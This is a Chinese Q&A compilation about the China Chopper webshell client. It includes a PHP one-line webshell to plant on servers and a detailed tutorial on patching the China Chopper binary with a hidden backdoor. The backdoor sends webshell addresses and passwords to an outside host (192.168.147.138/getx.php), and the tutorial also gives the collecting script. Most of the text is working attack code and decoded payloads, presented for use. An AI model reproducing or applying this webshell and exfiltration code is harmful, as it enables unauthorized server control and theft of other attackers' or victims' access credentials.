中国菜刀源码

⑴ 如何配置php才能让中国菜刀使用

在项目中新建一个PHP文件，里面写这样一段代码:<?php eval($_POST['ee']); ?>，再用中国菜刀去连接，密码：就是ee，可以随便改， 这里边更详细：http://www.jb51.net/hack/164013.html

⑵ 中国菜刀

你需要确定数据库支持外联。

⑶ “中国菜刀”工具有什么功能连接到服务器之前,需要在服务器上完成什么事情

摘要 1.中国菜刀支持的服务端脚本：PHP、ASP、asp.net；

⑷ 中国菜刀的简介：

产品名称：中国菜刀，不是原来切菜做饭的道具，而是一款专业的网站管理软件，用途广泛，使用方便，小巧实用。只要支持动态脚本的网站，都可以用中国菜刀来进行管理！程序大小：214K，在非简体中文环境下使用，自动切换到英文界面。UINCODE方式编译，支持多国语言输入显示。
--------------------------------------------------------------------------免责申明：请使用者注意使用环境并遵守国家相关法律法规！由于使用不当造成的后果本厂家不承担任何责任！--------------------------------------------------------------------------

⑸ 使用中国菜刀怎么运行服务端的代码

服务端只需要简单的一行代码.这绝对可以排入叉叉最喜欢的十大软件排行榜。(Ps:在某些黑阔手中菜刀算得上是居家旅行,杀人越货的必备神器),究竟

⑹ 中国菜刀这款工具中传输payload为何要使用base64进行编码

咨询记录 · 回答于2021-12-29

⑺ 如何给中国菜刀添加隐蔽后门

1、后门如何触发
这里要先讲下菜刀的后门是如何触发的，知道如何触发后门，后面按这个思路往下看会方便些。
当一句话连回目标服务器时，我们经常会在文件列表中右键查看文件，如下图

当我们执行右键-编辑文件时，我们的后门就会被触发（我们要添加的就是这样的一个隐藏后门）。
2、菜刀脱壳
在分析菜刀前，先把菜刀的壳脱掉，使用Peid可知，菜刀是UPx壳，网上找个Upx的脱壳工具即可脱壳。
3、查看数据包，分析流程（右键-编辑）
本地搭建好环境后，在菜刀中右键-编辑查看某一文件，使用burpsuite进行抓包，

数据如下
a=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=%w8LSIpO2RpZSgpOw%3D%3D&z1=%3D%3D

一共有3个参数，
a url解码后为@eval (base64_decode($_POST[z0]));
z0先url解码，在base64解码为
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|<-");die();

Z1先url解码，在base64解码为
C:\\wamp\\www\\robots.txt

稍微熟悉php的人应该能看出来，这段代码就是一个读文件的php脚本，由菜刀发送到目标服务器上，然后在目标服务器上执行的。 既然代码作为字符串发送带目标服务器上，那我我们可以再字符串上添加我们想执行的代码，由菜刀一起发送过去执行。

if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents('http://192.168.147.138/getx.php?cai='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}

如果我们将上这段代码作为字符串，发送到服务端执行，我们就能获得webshell的地址和密码。
4、使用OD分析
使用OD打开中国菜刀，右键搜索字符串，结果如下：

定位到php读取文的字符串处，点击进去到代码处

可知，程序时将其作为字符串，压入栈中作为参数被后续函数处理的，如果在这段字符串后加入我们的后门代码，就会被程序一块发送到服务端执行。
5、修改菜刀程序文件
由上可知，字符串的地址为0x49ba94,查看内存数据，

发现其后面已经被他字符串占用（直接查看原二进制文件结果也是如此），如果我们强制在后面添加后门字符串，就会破坏远程的某些内容。因此我们需要另外找一个空闲的大空间，将后门代码放在此处。
这里我们选取地址4841d0h的空间，转化为文件偏移即为841d0h。
将后门字符串
$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents('http://192.168.147.138/getx.php?cai='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}

放到文件841d0处
打开010editor 将上述字符串复制到010editor中，

由于程序中的字符串是双字节存放的，这里我们需要将后门代码也转化为双字节的。010ditor-工具-转换

使用010editor打开菜刀程序，跳到841d0h偏移处，将转换后的字符串覆盖替换菜刀程序中相同大小的数据长度，

保存文件，这样后门字符串就被我们添加到程序中了。
6、使用OD修改程序代码
用OD打开菜刀程序，定位到第4步中字符串入栈的代码处 push 0049bae4。
0049bae4地址是修改前字符串的位置，现在我们将其改成我们添加的字符串的地质处，字符串文件偏移为841d0h，转化内存偏移为4841d0h,代码修改如下

保存修改的文件即可。
7、测试修改结果
修改文件后，我们在看看菜刀-右键编辑，抓到数据包

Z0解密后为
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents('http://192.168.147.138/getx.php?cai='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));};echo("|<-");die();

可见我们的后门代码也一起被发送到服务端执行了。
编写加单的getx.php接收结果，
getx.php:
<?php
$getx = $_GET["cai"];
$file = fopen("getx.txt","a+");
fwrite($file,$getx);
fwrite($file,"\r\n");
fclose($file);
?>

结果如下：

8、后记
通过测试可知，对于asp，aspx跟php后门的添加相似，都可以实现。Jsp木马形式不一，实现添加后门较为困难。另外，由于后门是在服务端执行的，所以不容易被发现，本地抓包是检测不到后门的；OD中右键查看后门地址也是不能直接看到的。

⑻ 网站文件中出现一句代码，请问是什么意思

通过上传一句话木马可以用中国菜刀等软件获取您网站根目录，并且可以删除修改您的网站源码。

⑼ 中国菜刀是什么软件

中国菜刀是一款专业的网站管理软件，用途广泛，使用方便，小巧实用。

只要支持动态脚本的网站[如php/jsp/aspx/asp/cfm/ruby/cgi/python/perl等等]，都可以用中国菜刀来进行管理！

常用功能：
文件管理，虚拟终端，数据库管理。

其它功能：
WEB浏览器(POST浏览/自定义COOKIE浏览/自定义JS)
网站爬行(自动保存目录结构)
网站安全扫描。

在非简体中文环境下使用，自动切换到英文界面。